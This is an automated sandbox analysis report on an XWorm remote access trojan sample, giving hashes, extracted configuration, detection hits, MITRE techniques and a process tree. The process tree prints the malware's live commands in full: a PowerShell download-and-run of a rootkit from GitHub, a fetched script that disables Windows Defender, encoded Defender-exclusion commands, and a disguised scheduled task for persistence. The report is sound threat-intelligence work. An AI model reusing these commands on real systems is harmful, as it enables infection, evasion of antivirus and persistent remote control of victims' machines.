xworm | 07b6f8733155a98e4fd39d415104acc67677a6ab3ffaab73802ae5ab5bc56d5e

Analysis

max time kernel
6s
max time network
130s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
04/03/2025, 21:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootstrapperNew.exe
Size

2.9MB
MD5

95dc6da23a19b85742e9e88f6be99c34
SHA1

6472d33772b0827bbefa20702dc2845d91f77535
SHA256

07b6f8733155a98e4fd39d415104acc67677a6ab3ffaab73802ae5ab5bc56d5e
SHA512

a0671247f44a9fc2083456811032c7fbd3c4315deec8004ff1191911f2acf0ec97287f16d5f540c15382d84f2edc461731961071f238a2776b6c20fe076acfec
SSDEEP

49152:U8aLLZKgJlVSsCd0sRw/848jY0f4vYAPGiXKGEwILblKvf+nsXGfIjJqlRJZN+gi:UnLLIgbglw/8E0QvY4E/LbIf+nw41lRN

Score

10^/10

xworm defense_evasion discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Attributes

Install_directory
%port%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/GMv8QPCE

Signatures

Detect Xworm Payload 46 IoCs

resource	yara_rule
behavioral1/files/0x000c000000023c9a-4.dat	family_xworm
behavioral1/memory/2732-12-0x00000000008D0000-0x00000000008E4000-memory.dmp	family_xworm
behavioral1/memory/2732-483-0x000000001C480000-0x000000001C492000-memory.dmp	family_xworm
behavioral1/memory/3248-2048-0x0000000000350000-0x0000000000364000-memory.dmp	family_xworm
behavioral1/memory/3984-2074-0x0000000000C40000-0x0000000000C54000-memory.dmp	family_xworm
behavioral1/memory/2608-2114-0x0000000000430000-0x0000000000444000-memory.dmp	family_xworm
behavioral1/memory/7048-2153-0x00000000000A0000-0x00000000000B4000-memory.dmp	family_xworm
behavioral1/memory/6540-2228-0x0000000000700000-0x0000000000714000-memory.dmp	family_xworm
behavioral1/memory/6724-2250-0x00000000000A0000-0x00000000000B4000-memory.dmp	family_xworm
behavioral1/memory/1472-2330-0x00000000008F0000-0x0000000000904000-memory.dmp	family_xworm
behavioral1/memory/1896-2377-0x00000000005A0000-0x00000000005B4000-memory.dmp	family_xworm
behavioral1/memory/6288-2399-0x0000000000AC0000-0x0000000000AD4000-memory.dmp	family_xworm
behavioral1/memory/6676-2464-0x0000000000650000-0x0000000000664000-memory.dmp	family_xworm
behavioral1/memory/8100-2494-0x0000000000580000-0x0000000000594000-memory.dmp	family_xworm
behavioral1/memory/2116-2535-0x0000000000650000-0x0000000000664000-memory.dmp	family_xworm
behavioral1/memory/7504-2552-0x0000000000BE0000-0x0000000000BF4000-memory.dmp	family_xworm
behavioral1/memory/7628-2588-0x0000000000760000-0x0000000000774000-memory.dmp	family_xworm
behavioral1/memory/3364-2622-0x0000000000310000-0x0000000000324000-memory.dmp	family_xworm
behavioral1/memory/7752-2654-0x0000000000F10000-0x0000000000F24000-memory.dmp	family_xworm
behavioral1/memory/5972-2684-0x0000000000F80000-0x0000000000F94000-memory.dmp	family_xworm
behavioral1/memory/392-2701-0x00000000003B0000-0x00000000003C4000-memory.dmp	family_xworm
behavioral1/memory/8124-2743-0x0000000000D60000-0x0000000000D74000-memory.dmp	family_xworm
behavioral1/memory/5424-2772-0x0000000000930000-0x0000000000944000-memory.dmp	family_xworm
behavioral1/memory/6804-2849-0x0000000000B20000-0x0000000000B34000-memory.dmp	family_xworm
behavioral1/memory/6480-2879-0x0000000000F90000-0x0000000000FA4000-memory.dmp	family_xworm
behavioral1/memory/2044-2974-0x0000000000D70000-0x0000000000D84000-memory.dmp	family_xworm
behavioral1/memory/5024-3001-0x00000000006D0000-0x00000000006E4000-memory.dmp	family_xworm
behavioral1/memory/7116-3059-0x0000000000150000-0x0000000000164000-memory.dmp	family_xworm
behavioral1/memory/6688-3097-0x0000000000E80000-0x0000000000E94000-memory.dmp	family_xworm
behavioral1/memory/5884-3138-0x0000000000290000-0x00000000002A4000-memory.dmp	family_xworm
behavioral1/memory/2856-3175-0x0000000000570000-0x0000000000584000-memory.dmp	family_xworm
behavioral1/memory/5736-3214-0x0000000000140000-0x0000000000154000-memory.dmp	family_xworm
behavioral1/memory/7964-3315-0x0000000000E40000-0x0000000000E54000-memory.dmp	family_xworm
behavioral1/memory/5732-3334-0x0000000000BC0000-0x0000000000BD4000-memory.dmp	family_xworm
behavioral1/memory/6620-3364-0x00000000008B0000-0x00000000008C4000-memory.dmp	family_xworm
behavioral1/memory/8176-3423-0x00000000004C0000-0x00000000004D4000-memory.dmp	family_xworm
behavioral1/memory/5748-3547-0x00000000001A0000-0x00000000001B4000-memory.dmp	family_xworm
behavioral1/memory/2140-3713-0x0000000000110000-0x0000000000124000-memory.dmp	family_xworm
behavioral1/memory/2180-3730-0x00000000000A0000-0x00000000000B4000-memory.dmp	family_xworm
behavioral1/memory/1908-3796-0x0000000000300000-0x0000000000314000-memory.dmp	family_xworm
behavioral1/memory/6960-3903-0x00000000005B0000-0x00000000005C4000-memory.dmp	family_xworm
behavioral1/memory/1836-3952-0x0000000000650000-0x0000000000664000-memory.dmp	family_xworm
behavioral1/memory/5620-4012-0x0000000000C70000-0x0000000000C84000-memory.dmp	family_xworm
behavioral1/memory/6672-4059-0x0000000000560000-0x0000000000574000-memory.dmp	family_xworm
behavioral1/memory/1836-4133-0x0000000000B60000-0x0000000000B74000-memory.dmp	family_xworm
behavioral1/memory/7704-4173-0x0000000000010000-0x0000000000024000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4268	powershell.exe

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	WMI Provider Host.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe

Executes dropped EXE 10 IoCs

pid	Process
2732	WMI Provider Host.exe
3536	WMI Provider Host.exe
2012	WMI Provider Host.exe
880	WMI Provider Host.exe
848	WMI Provider Host.exe
1576	WMI Provider Host.exe
3520	WMI Provider Host.exe
3140	WMI Provider Host.exe
1924	WMI Provider Host.exe
5020	WMI Provider Host.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
10	pastebin.com
11	pastebin.com
16	raw.githubusercontent.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
5876	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5512	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
2204	powershell.exe
3980	powershell.exe
4976	powershell.exe
2204	powershell.exe
2204	powershell.exe
3980	powershell.exe
3980	powershell.exe
4064	powershell.exe
4064	powershell.exe
4976	powershell.exe
4976	powershell.exe
2292	powershell.exe
2292	powershell.exe
4268	powershell.exe
4268	powershell.exe
2288	powershell.exe
2288	powershell.exe
4064	powershell.exe
2292	powershell.exe
3548	powershell.exe
3548	powershell.exe
4268	powershell.exe
4784	powershell.exe
4784	powershell.exe
2288	powershell.exe
4784	powershell.exe
3548	powershell.exe
3088	powershell.exe
3088	powershell.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	2732	WMI Provider Host.exe
Token: SeDebugPrivilege	3536	WMI Provider Host.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	2012	WMI Provider Host.exe
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	880	WMI Provider Host.exe
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeDebugPrivilege	848	WMI Provider Host.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	1576	WMI Provider Host.exe
Token: SeDebugPrivilege	4268	powershell.exe
Token: SeDebugPrivilege	3520	WMI Provider Host.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	3548	powershell.exe
Token: SeDebugPrivilege	3140	WMI Provider Host.exe
Token: SeDebugPrivilege	1924	WMI Provider Host.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	5020	WMI Provider Host.exe
Token: SeDebugPrivilege	3088	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 512 wrote to memory of 3980	512	BootstrapperNew.exe	88
PID 512 wrote to memory of 3980	512	BootstrapperNew.exe	88
PID 512 wrote to memory of 3980	512	BootstrapperNew.exe	88
PID 512 wrote to memory of 2732	512	BootstrapperNew.exe	90
PID 512 wrote to memory of 2732	512	BootstrapperNew.exe	90
PID 512 wrote to memory of 3740	512	BootstrapperNew.exe	91
PID 512 wrote to memory of 3740	512	BootstrapperNew.exe	91
PID 512 wrote to memory of 3740	512	BootstrapperNew.exe	91
PID 3740 wrote to memory of 2204	3740	BootstrapperNew.exe	92
PID 3740 wrote to memory of 2204	3740	BootstrapperNew.exe	92
PID 3740 wrote to memory of 2204	3740	BootstrapperNew.exe	92
PID 3740 wrote to memory of 3536	3740	BootstrapperNew.exe	93
PID 3740 wrote to memory of 3536	3740	BootstrapperNew.exe	93
PID 3740 wrote to memory of 1088	3740	BootstrapperNew.exe	95
PID 3740 wrote to memory of 1088	3740	BootstrapperNew.exe	95
PID 3740 wrote to memory of 1088	3740	BootstrapperNew.exe	95
PID 1088 wrote to memory of 4976	1088	BootstrapperNew.exe	96
PID 1088 wrote to memory of 4976	1088	BootstrapperNew.exe	96
PID 1088 wrote to memory of 4976	1088	BootstrapperNew.exe	96
PID 1088 wrote to memory of 2012	1088	BootstrapperNew.exe	97
PID 1088 wrote to memory of 2012	1088	BootstrapperNew.exe	97
PID 1088 wrote to memory of 1908	1088	BootstrapperNew.exe	121
PID 1088 wrote to memory of 1908	1088	BootstrapperNew.exe	121
PID 1088 wrote to memory of 1908	1088	BootstrapperNew.exe	121
PID 1908 wrote to memory of 4064	1908	BootstrapperNew.exe	100
PID 1908 wrote to memory of 4064	1908	BootstrapperNew.exe	100
PID 1908 wrote to memory of 4064	1908	BootstrapperNew.exe	100
PID 1908 wrote to memory of 880	1908	BootstrapperNew.exe	283
PID 1908 wrote to memory of 880	1908	BootstrapperNew.exe	283
PID 1908 wrote to memory of 3332	1908	BootstrapperNew.exe	103
PID 1908 wrote to memory of 3332	1908	BootstrapperNew.exe	103
PID 1908 wrote to memory of 3332	1908	BootstrapperNew.exe	103
PID 3332 wrote to memory of 2292	3332	BootstrapperNew.exe	104
PID 3332 wrote to memory of 2292	3332	BootstrapperNew.exe	104
PID 3332 wrote to memory of 2292	3332	BootstrapperNew.exe	104
PID 3332 wrote to memory of 848	3332	BootstrapperNew.exe	105
PID 3332 wrote to memory of 848	3332	BootstrapperNew.exe	105
PID 3332 wrote to memory of 392	3332	BootstrapperNew.exe	107
PID 3332 wrote to memory of 392	3332	BootstrapperNew.exe	107
PID 3332 wrote to memory of 392	3332	BootstrapperNew.exe	107
PID 2732 wrote to memory of 4268	2732	WMI Provider Host.exe	108
PID 2732 wrote to memory of 4268	2732	WMI Provider Host.exe	108
PID 392 wrote to memory of 2288	392	BootstrapperNew.exe	110
PID 392 wrote to memory of 2288	392	BootstrapperNew.exe	110
PID 392 wrote to memory of 2288	392	BootstrapperNew.exe	110
PID 392 wrote to memory of 1576	392	BootstrapperNew.exe	111
PID 392 wrote to memory of 1576	392	BootstrapperNew.exe	111
PID 392 wrote to memory of 1328	392	BootstrapperNew.exe	112
PID 392 wrote to memory of 1328	392	BootstrapperNew.exe	112
PID 392 wrote to memory of 1328	392	BootstrapperNew.exe	112
PID 1328 wrote to memory of 3548	1328	BootstrapperNew.exe	114
PID 1328 wrote to memory of 3548	1328	BootstrapperNew.exe	114
PID 1328 wrote to memory of 3548	1328	BootstrapperNew.exe	114
PID 1328 wrote to memory of 3520	1328	BootstrapperNew.exe	131
PID 1328 wrote to memory of 3520	1328	BootstrapperNew.exe	131
PID 1328 wrote to memory of 4520	1328	BootstrapperNew.exe	116
PID 1328 wrote to memory of 4520	1328	BootstrapperNew.exe	116
PID 1328 wrote to memory of 4520	1328	BootstrapperNew.exe	116
PID 4520 wrote to memory of 4784	4520	BootstrapperNew.exe	398
PID 4520 wrote to memory of 4784	4520	BootstrapperNew.exe	398
PID 4520 wrote to memory of 4784	4520	BootstrapperNew.exe	398
PID 4520 wrote to memory of 3140	4520	BootstrapperNew.exe	379
PID 4520 wrote to memory of 3140	4520	BootstrapperNew.exe	379
PID 4520 wrote to memory of 1908	4520	BootstrapperNew.exe	414

C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:512
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3980
- C:\Windows\WMI Provider Host.exe
  "C:\Windows\WMI Provider Host.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4268
  - - C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe
      "C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"
      4⤵
      PID:5376
    - - C:\ProgramData\MasonRootkit.exe
        
        "C:\ProgramData\MasonRootkit.exe"
        5⤵
        
        PID:5636
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE06D.tmp.bat""
        5⤵
        
        PID:5412
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:5876
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "WMI Provider Host" /tr "C:\Users\Admin\AppData\Roaming\WMI Provider Host.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5512
- C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3740
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2204
- - C:\Windows\WMI Provider Host.exe
    "C:\Windows\WMI Provider Host.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3536
- - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
    "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
    3⤵
    - Checks computer location settings
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1088
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4976
  - - C:\Windows\WMI Provider Host.exe
      "C:\Windows\WMI Provider Host.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2012
  - - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
      "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
      4⤵
      Checks computer location settings
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1908
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4064
    - - C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:880
    - - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        5⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3332
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
      - C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:848
      - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        6⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        7⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3548
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3520
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        8⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4520
        
